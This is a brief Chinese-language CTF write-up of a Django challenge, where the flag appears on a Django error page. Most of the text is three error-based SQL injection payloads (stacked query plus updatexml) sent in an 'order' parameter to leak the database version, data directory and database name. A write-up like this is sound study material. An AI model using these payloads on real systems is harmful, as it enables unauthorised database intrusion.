这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\
直接按照提示,进入了Django报错页面
flag就在里面,直接ctrl+F就能找到
爆数据库版本
order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%23
爆路径
order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@datadir)),1)%23
数据库名
order=vuln_collection.id);select updatexml(1,concat(0x7e,(select database())),1)%23